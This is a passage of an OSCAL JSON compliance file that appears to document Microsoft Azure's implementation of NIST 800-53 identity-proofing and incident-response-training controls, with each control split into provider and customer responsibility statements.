credentials."}],"responsibilities":[{"uuid":"1f2f503d-277a-4499-96a0-7b9d272f580c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-049"}],"description":"The customer is responsible for conforming to the profiles issued by the Federal Identity, Credential, and Access Management (FICAM) Trust Framework Solutions initiative. 
Note: if the customer's deployed resources do not allow third-party credentials, this control is not applicable.","provided-uuid":"4e33db7f-8c64-430a-91fc-99b60a21dd27"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"183452e8-6bb5-43eb-92c1-2f24b1c0ce7c","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-11","statements":[{"uuid":"6cad257e-163d-4c46-b18a-0a5e5b2fc808","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-050"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-11_smt","by-components":[{"uuid":"cbc488eb-5115-4a1f-9223-988ba962bd27","export":{"provided":[{"uuid":"af3a0232-33dc-444f-aec9-8d137ba2c84b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-050"}],"description":"By default, accounts do not have active elevated permissions to the production environment. Elevation requires a user to request temporary Just In Time (JIT) access through the JIT portal. Azure requires users to re-authenticate when one of two situations occurs:\n\n* When the user's credentials change or authenticators expire, or\n* When privilege escalation is required, such as when JIT access is needed\n\nWhen authenticators expire, an Azure user must re-authenticate following the password change. 
When an Azure user requires administrative access to services within the environment, they must submit a request for elevation and be granted access via the JIT service. Access via JIT requires the creation of temporary authenticators, which adds an additional level of access control. Azure leverages Secure Admin Workstations (SAWs), which serve as the gateway into the Azure FedRAMP High and DoD SRG-defined authorization boundary. The screensaver session lock is activated within 10 minutes of inactivity on the SAW. Therefore, personnel are required to re-authenticate within 10 minutes of inactivity on a SAW."}],"responsibilities":[{"uuid":"3d4542e9-a19e-46bf-aff2-75b3119ae828","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-050"}],"description":"The customer is responsible for requiring users to re-authenticate when organization-defined circumstances or situations require re-authentication.","provided-uuid":"af3a0232-33dc-444f-aec9-8d137ba2c84b"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"5bbca062-f4e3-429a-a4b8-1bfee40390dc","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-12","statements":[{"uuid":"4ba4d8c1-ec76-4c25-a983-5ea8636bce02","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-051"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-12_smt.a","by-components":[{"uuid":"17ceb941-ad1f-40ce-8f4e-39409db956ca","export":{"provided":[{"uuid":"653a1f27-8b4c-45a5-acc5-8530e0333ddd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-051"}],"description":"As a part of initial account setup on Microsoft's corporate network, known as CorpNet, all Microsoft personnel have their identity validated using government-issued identification. This identity validation is then used to activate the user's CorpNet account, known as an alias. This alias is then used to implement non-repudiation throughout all Azure production environments. Access to production Azure clouds is requested via the CorpNet alias, ensuring identity proofing is implemented across all clouds. This alias is consistent across all of a user's accounts in all Microsoft domains. All Azure access requests and approvals leverage these CorpNet aliases. New Azure user accounts are created for existing Microsoft users who require access to Azure resources and refer to them by their unique CorpNet identifiers, known as aliases. The identity validation is conducted virtually by the third-party vendor HireRight, 
whose responsibility is to perform background checks and verify government-issued IDs prior to the issuance of CorpNet aliases to Microsoft personnel. This process ensures the integrity and security of Microsoft Azure operations. Azure smart cards tied to the specific environment of access are shipped via FedEx in a deactivated state and cannot be used until they are activated. A note is added to the user's account confirming the shipping number for tracking. Shipments require a signature for delivery. Smart cards are not activated until Core Services Engineering and Operations (CSEO) receives a confirmation email from the recipient, the recipient's manager, AAM, or Security, ensuring the user's alias is consistent and validating the user's identity. The recipient must email the ticketing team from their Microsoft corporate email. The ticketing team provides the response. The smart card team works with the recipient to unlock their smart card via the ticketing tool. If the user is located in the Puget Sound region, they must come to the main Microsoft campus to pick up their smart card. 
If the user is outside of the Puget Sound region, the smart card is shipped directly to the individual and auto-disabled until activated by the user."}],"responsibilities":[{"uuid":"d391de06-b255-45d0-8b3a-410d2a07e803","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-051"}],"description":"The customer is responsible for identity proofing users that require accounts for logical access to systems based on appropriate identity assurance level requirements as specified in applicable standards and guidelines.","provided-uuid":"653a1f27-8b4c-45a5-acc5-8530e0333ddd"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"97b0bc6d-d8dd-4f12-8f2b-9bd39e209669","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-052"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-12_smt.b","by-components":[{"uuid":"33b8526b-170c-448b-b325-a51266f1010e","export":{"provided":[{"uuid":"94e4d0a6-cf68-495c-b9cd-b93e03ebcac0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-052"}],"description":"The Microsoft CorpNet alias that follows all Microsoft personnel is unique, and ensures that non-repudiation is implemented and Azure is able to resolve user identities to a unique individual. 
This CorpNet alias is used in all Azure identity domains to ensure non-repudiation and resolution of user identities to a unique individual globally across all clouds."}],"responsibilities":[{"uuid":"5e47e030-67b9-4ac3-b4f9-605a2297b7c8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-052"}],"description":"The customer is responsible for resolving user identities to a unique individual.","provided-uuid":"94e4d0a6-cf68-495c-b9cd-b93e03ebcac0"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"0f9095ec-0c07-4708-9860-fb4e8d7827ab","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-053"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-12_smt.c","by-components":[{"uuid":"7c209870-0d70-4270-9ee7-7907d3ea7171","export":{"provided":[{"uuid":"9dffb783-32cf-4b2b-8c79-bd1dc66a49ff","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-053"}],"description":"As a part of initial account setup on the Microsoft corporate network (CorpNet), all Microsoft personnel have their identity validated using government-issued identification. This establishes the user's alias, which is then used to implement non-repudiation throughout all Azure production environments. 
Access to production Azure clouds is then requested via the CorpNet alias, ensuring identity proofing is implemented across all clouds."}],"responsibilities":[{"uuid":"089df601-c4d4-4f78-a98a-091f52f1cef3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-053"}],"description":"The customer is responsible for collecting, validating, and verifying identity evidence.","provided-uuid":"9dffb783-32cf-4b2b-8c79-bd1dc66a49ff"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"0eae8e47-4a6b-441a-b039-56efc1dde64f","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-12.2","statements":[{"uuid":"49fbc423-c690-4cd5-9cc4-4d9f650d06b3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-054"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-12.2_smt","by-components":[{"uuid":"9a0528f2-d8f2-4446-a530-e0ce4191b345","export":{"provided":[{"uuid":"e589b81f-2755-492b-9a7f-7e24ffaf6db7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-054"}],"description":"As a part of initial account setup on Microsoft's corporate network, known as CorpNet, all Microsoft personnel have their identity validated using government-issued identification. This identity validation is then used to activate the user's CorpNet account, known as an alias. 
This alias is then used to implement non-repudiation throughout all Azure production environments. Access to production Azure clouds is requested via the CorpNet alias, ensuring identity proofing is implemented across all clouds. This alias is consistent across all of a user's accounts in all Microsoft domains. All Azure access requests and approvals leverage these CorpNet aliases. New Azure user accounts are created for existing Microsoft users who require access to Azure resources and refer to them by their unique CorpNet identifiers, known as aliases. The identity validation is conducted virtually by the third-party vendor HireRight, whose responsibility is to perform background checks and verify government-issued IDs prior to the issuance of CorpNet aliases to Microsoft personnel. This process ensures the integrity and security of Microsoft Azure operations. Azure smart cards tied to the specific environment of access are shipped via FedEx in a deactivated state and cannot be used until they are activated. A note is added to the user's account confirming the shipping number for tracking. Shipments require a signature for delivery. Smart cards are not activated until Core Services Engineering and Operations (CSEO) receives a confirmation email from the recipient, the recipient's manager, AAM, or Security, ensuring the user's alias is consistent and validating the user's identity. The recipient must email the ticketing team from their Microsoft corporate email. The ticketing team provides the response. The smart card team works with the recipient to unlock their smart card via the ticketing tool. If the user is located in the Puget Sound region, they must come to the main Microsoft campus to pick up their smart card. 
If the user is outside of the Puget Sound region, the smart card is shipped directly to the individual and auto-disabled until activated by the user."}],"responsibilities":[{"uuid":"2abaeebc-c058-49a8-bbd1-9e1250d480b7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-054"}],"description":"The customer is responsible for requiring evidence of individual identification be presented to the registration authority.","provided-uuid":"e589b81f-2755-492b-9a7f-7e24ffaf6db7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"1d738f83-4940-40ec-a41d-3cbe0968105c","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-12.3","statements":[{"uuid":"d3a2c3c3-2769-4110-9cd1-dffd9c871947","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-055"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-12.3_smt","by-components":[{"uuid":"f34e12db-f082-406c-9fc2-25ce4fe0c106","export":{"provided":[{"uuid":"6dc8eba9-4577-45e1-a899-297f393d5cc1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-055"}],"description":"As a part of initial account setup on Microsoft's corporate network, known as CorpNet, all Microsoft personnel have their identity validated using government-issued identification. This identity validation is then used to activate the user's CorpNet account, known as an alias. 
This alias is then used to implement non-repudiation throughout all Azure production environments. Access to production Azure clouds is requested via the CorpNet alias, ensuring identity proofing is implemented across all clouds. This alias is consistent across all of a user's accounts in all Microsoft domains. All Azure access requests and approvals leverage these CorpNet aliases. New Azure user accounts are created for existing Microsoft users who require access to Azure resources and refer to them by their unique CorpNet identifiers, known as aliases. The identity validation is conducted virtually by the third-party vendor HireRight, whose responsibility is to perform background checks and verify government-issued IDs prior to the issuance of CorpNet aliases to Microsoft personnel. This process ensures the integrity and security of Microsoft Azure operations. Azure smart cards tied to the specific environment of access are shipped via FedEx in a deactivated state and cannot be used until they are activated. A note is added to the user's account confirming the shipping number for tracking. Shipments require a signature for delivery. Smart cards are not activated until Core Services Engineering and Operations (CSEO) receives a confirmation email from the recipient, the recipient's manager, AAM, or Security, ensuring the user's alias is consistent and validating the user's identity. The recipient must email the ticketing team from their Microsoft corporate email. The ticketing team provides the response. The smart card team works with the recipient to unlock their smart card via the ticketing tool. If the user is located in the Puget Sound region, they must come to the main Microsoft campus to pick up their smart card. 
If the user is outside of the Puget Sound region, the smart card is shipped directly to the individual and auto-disabled until activated by the user."}],"responsibilities":[{"uuid":"9e91397c-713f-408c-82ec-7fe25de09ad3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-055"}],"description":"The customer is responsible for requiring that the presented identity evidence be validated and verified through organizational defined methods of validation and verification.","provided-uuid":"6dc8eba9-4577-45e1-a899-297f393d5cc1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"6db7d132-773d-41be-9f01-27333e35efc5","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-12.4","statements":[{"uuid":"361c941f-2365-4ca5-a060-41882beaf012","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-056"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-12.4_smt","by-components":[{"uuid":"6209a076-b605-47a2-9a74-856e9d79eeaf","export":{"provided":[{"uuid":"4a97f808-03c4-48a0-af4c-9fadc2bacf3b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-056"}],"description":"As a part of initial account setup on Microsoft's corporate network, known as CorpNet, all Microsoft personnel have their identity validated using government-issued identification. 
This identity validation is then used to activate the user's CorpNet account, known as an alias. This alias is then used to implement non-repudiation throughout all Azure production environments. Access to production Azure clouds is requested via the CorpNet alias, ensuring identity proofing is implemented across all clouds. This alias is consistent across all of a user's accounts in all Microsoft domains. All Azure access requests and approvals leverage these CorpNet aliases. New Azure user accounts are created for existing Microsoft users who require access to Azure resources and refer to them by their unique CorpNet identifiers, known as aliases. The identity validation is conducted virtually by the third-party vendor HireRight, whose responsibility is to perform background checks and verify government-issued IDs prior to the issuance of CorpNet aliases to Microsoft personnel. This process ensures the integrity and security of Microsoft Azure operations. Azure smart cards tied to the specific environment of access are shipped via FedEx in a deactivated state and cannot be used until they are activated. A note is added to the user's account confirming the shipping number for tracking. Shipments require a signature for delivery. Smart cards are not activated until Core Services Engineering and Operations (CSEO) receives a confirmation email from the recipient, the recipient's manager, AAM, or Security, ensuring the user's alias is consistent and validating the user's identity. The recipient must email the ticketing team from their Microsoft corporate email. The ticketing team provides the response. The smart card team works with the recipient to unlock their smart card via the ticketing tool. If the user is located in the Puget Sound region, they must come to the main Microsoft campus to pick up their smart card. 
If the user is outside of the Puget Sound region, the smart card is shipped directly to the individual and auto-disabled until activated by the user."}],"responsibilities":[{"uuid":"649f1e10-d8f1-4382-a500-1435cd914b51","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-056"}],"description":"The customer is responsible for requiring that the validation and verification of identity evidence be conducted in person before a designated registration authority.","provided-uuid":"4a97f808-03c4-48a0-af4c-9fadc2bacf3b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"72dc563e-9d49-4f02-b735-b39fff248805","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-12.5","statements":[{"uuid":"54b278e8-4d74-4ad7-aa43-1ee92de1f69a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-057"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-12.5_smt","by-components":[{"uuid":"6d146c6f-03ee-4cc7-ab9f-a6fdb9aecabc","export":{"provided":[{"uuid":"e29f732a-0d19-4e48-bcf7-db912dfef5d2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-057"}],"description":"As a part of initial account setup on Microsoft's corporate network, known as CorpNet, all Microsoft personnel have their identity validated using government-issued identification. 
This identity validation is then used to activate the user's CorpNet account, known as an alias. This alias is then used to implement non-repudiation throughout all Azure production environments. Access to production Azure clouds is requested via the CorpNet alias, ensuring identity proofing is implemented across all clouds. This alias is consistent across all a user's accounts in all Microsoft domains. All Azure access requests and approvals leverage these CorpNet aliases. New Azure user accounts refer to identities of existing Microsoft users using their unique CorpNet identifiers, known as aliases, who require access to Azure resources. The validation is conducted virtually by the third-party vendor, HireRight. Their responsibility is to perform background checks and verify government-issued IDs prior to the issuance of CorpNet aliases to Microsoft personnel. This process ensures the integrity and security of Microsoft Azure operations. Azure smart cards tied to the specific environment of access are shipped via FedEx in a deactivated state and cannot be used until they are activated. A note is added to the user's account confirming the shipping number for tracking. Shipments require a signature for delivery. Smart cards are not activated until Core Services Engineering and Operations (CSEO) receives a confirmation email from the recipient, recipient's manager, AAM, or Security, ensuring the user's alias is consistent and validating the user's identity. The recipient must email the ticketing team from their Microsoft corporate email. The ticketing team provides the response. The smart card team works with the recipient to unlock their smart card via the ticketing tool. If the user is located in the Puget Sound region, they must come to the main Microsoft campus to pick up their smart card. 
If the user is outside of the Puget Sound region, the smart card is shipped directly to the individual and auto-disabled until activated by the user."}],"responsibilities":[{"uuid":"a41f86fd-d7c5-4bc7-9161-001a17b55232","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-057"}],"description":"The customer is responsible for requiring that a registration code or notice of proofing be delivered through an out-of-band channel to verify the user's address (physical or digital) of record.","provided-uuid":"e29f732a-0d19-4e48-bcf7-db912dfef5d2"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"8e30a3bb-1d99-4be6-b05d-496a66c4c70f","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-2","statements":[{"uuid":"29525144-f686-4e62-a0f6-6bb090c35d86","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-006"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-2_smt.a","by-components":[{"uuid":"a7e2ed21-855c-407b-a4b2-af6db8aeaa0d","export":{"provided":[{"uuid":"556786df-c16b-44bc-8085-7737da1eb23a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-006"}],"description":"Microsoft provides training annually to all Azure personnel on how to recognize, respond to, and report incidents as part of the basic security awareness training provided via the Security and Privacy Foundations and STRIKE training. 
As documented in the Azure Incident Management SOP, incident managers ensure that all personnel, including new hires, are trained on incident handling procedures and protocols consistent with assigned roles and responsibilities.\n\nThis training consists of on-the-job oversight by current members of the Security Response Team. The Security Response Team uses job shadowing of real incidents and red team engagements due to the centralized nature of the incident management function in Azure and the availability of job-shadowing within the Security Response Team. Live, ongoing, on-the-job training provides a more thorough and realistic incident management training environment by indoctrinating all stakeholders with the incident management procedures in real time. After a period of apprenticeship, generally around sixty days, the Security Response Team provides unaccompanied access to all necessary systems, if appropriate. While there is no specific annual refresher course in incident management, the Security Response Team is continuously trained through daily incident management activities, team meetings, and engagement with external organizations.\n\nThe following roles in Azure Incident Management require specific on-boarding training: Incident Engineer, Incident Manager, Security Incident Engineer, Security Incident Manager, and Communications Manager. Part of the training replicates a real incident and walks personnel through the incident management process. Additionally, incident management tests and exercises are considered in-place training and are used to support other onsite training for new employees and other support staff with incident roles. 
Personnel are not made aware that they are being tested during incident management tests.\n\nAs part of the service team-specific incident management procedures, each team provides additional information and training to provide an understanding of the team's distinct responsibilities and accountabilities in support of incident management. Service teams designate incident management personnel or distribution lists as part of Service Tree configurations."}],"responsibilities":[{"uuid":"0c9ad911-fb66-41a3-81cd-0323e4f4933a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-006"}],"description":"The customer is responsible for providing incident response training to users of customer-deployed resources in accordance with assigned roles and responsibilities.","provided-uuid":"556786df-c16b-44bc-8085-7737da1eb23a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"1b495f8e-8e87-44d0-a429-f11642133609","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-007"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-2_smt.b","by-components":[{"uuid":"f11d00c6-6bdc-44c6-aa2b-ba4d31288a7e","export":{"provided":[{"uuid":"b2fb98e2-11a7-49dc-a65b-e8ce49feabf2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-007"}],"description":"As changes to Azure assets and procedures occur, Azure management considers whether additional incident management training is needed. If so, the training is developed and provided to applicable personnel. 
This includes training provided through on-the-job requirements, SOP updates, and team meetings."}],"responsibilities":[{"uuid":"db71b007-22de-4dbf-975d-80c3733e0575","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-007"}],"description":"The customer is responsible for providing incident response retraining to users of customer-deployed resources, when changes occur, in accordance with assigned roles and responsibilities.","provided-uuid":"b2fb98e2-11a7-49dc-a65b-e8ce49feabf2"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"0774adb0-6ba8-49d7-97e0-8ebe02cb942f","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-2.1","statements":[{"uuid":"5e14354c-05da-4e90-a32a-430de2ed4c6a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-008"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-2.1_smt","by-components":[{"uuid":"478f496f-f331-4f5d-936c-84d43e4cc024","export":{"provided":[{"uuid":"718ac3df-8879-47fc-9b4f-0d64bfc3cdaf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-008"}],"description":"Service teams include Red Team exercises as part of incident management training. Red Team exercises are intended to identify weaknesses in the existing incident management processes. 
Incident tests and exercises are considered in-place training and are used to support other onsite training for new personnel with incident roles.\n\nService teams include tabletop and functional exercises as part of incident management training. Part of the training replicates a real incident and walks personnel through the incident management process. Additionally, incident management tests and exercises are considered in-place training and are used to support other onsite training for new employees and other support staff with incident roles. Personnel are not made aware that they are being tested during incident management tests.\n\nAs part of the service team-specific incident management procedures, each team provides additional information and training to provide an understanding of the team's distinct responsibilities and accountabilities in support of incident management.\n\nThe Security Response Team uses job shadowing of real and red team incidents due to the centralized nature of the incident management function in Azure and the availability of job-shadowing within the Security Response Team. Live, ongoing, on-the-job training provides a more thorough and realistic security incident management training environment by indoctrinating all stakeholders with the incident management procedures in real time. 
Azure considers job shadowing of live incidents a preferred and more effective alternative to simulated training mechanisms."}],"responsibilities":[{"uuid":"fa17958c-0e36-458f-9f61-7c3a0b30338e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-008"}],"description":"The customer is responsible for providing incident response training, which incorporates simulated events, to users of customer-deployed resources in accordance with assigned roles and responsibilities.","provided-uuid":"718ac3df-8879-47fc-9b4f-0d64bfc3cdaf"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"ca452da0-691f-4a57-bd6a-1e9e5fbbaecb","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-2.2","statements":[{"uuid":"ca415d48-70b4-4a86-ac26-fc5323c5ee48","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-009"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-2.2_smt","by-components":[{"uuid":"7591d9b9-957c-4a9c-a44c-fce02db9862e","export":{"provided":[{"uuid":"b66f8081-f346-4c1d-8087-83d42dba1037","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-009"}],"description":"To provide a thorough and realistic 
environment, security incident management training occurs through on-the-job shadowing during real and red team incidents affecting the production environment, with senior security incident responders training newer personnel to provide real-world experience and situations for training purposes. Live, ongoing, on-the-job training provides a more thorough and realistic security incident management training environment by indoctrinating all stakeholders with the incident management procedures in real time. Azure considers job shadowing of live incidents a preferred and more effective alternative to automated training mechanisms."}],"responsibilities":[{"uuid":"bec70b72-65cb-4cce-a2a0-16bc2009febe","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-009"}],"description":"The customer is responsible for providing incident response training, which employs automated mechanisms, to users of customer-deployed resources in accordance with assigned roles and responsibilities.","provided-uuid":"b66f8081-f346-4c1d-8087-83d42dba1037"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"da1bfbbc-b55e-4d9e-98bd-9f4f557f3311","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-3","statements":[{"uuid":"3ad44a67-92cf-4563-8a35-b711c949849b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-010"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-3_smt","by-components":[{"uuid":"d6a866b4-1e49-4ed4-8d40-a300c2e89750","export":{"provided":[{"uuid":"221d8114-146e-4af0-8bc2-08b7580513a7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-010"}],"description":"Azure tests the incident management capability by using a process that is consistent with the NIST Special Publication 800-61, Revision 2, Computer Security Incident Handling Guide. The Azure incident management capability is exercised by the Security Response Team on a regular basis as security incidents are identified and reported. In addition, Red Team exercises are utilized generally every two weeks to test and identify weaknesses in the incident management process. Lastly, regular mandatory exercises in coordination with contingency planning activities are performed at least annually._x000D_ _x000D_ All issues and action items identified during the exercise are documented in an incident tracking system and worked on until resolved. 
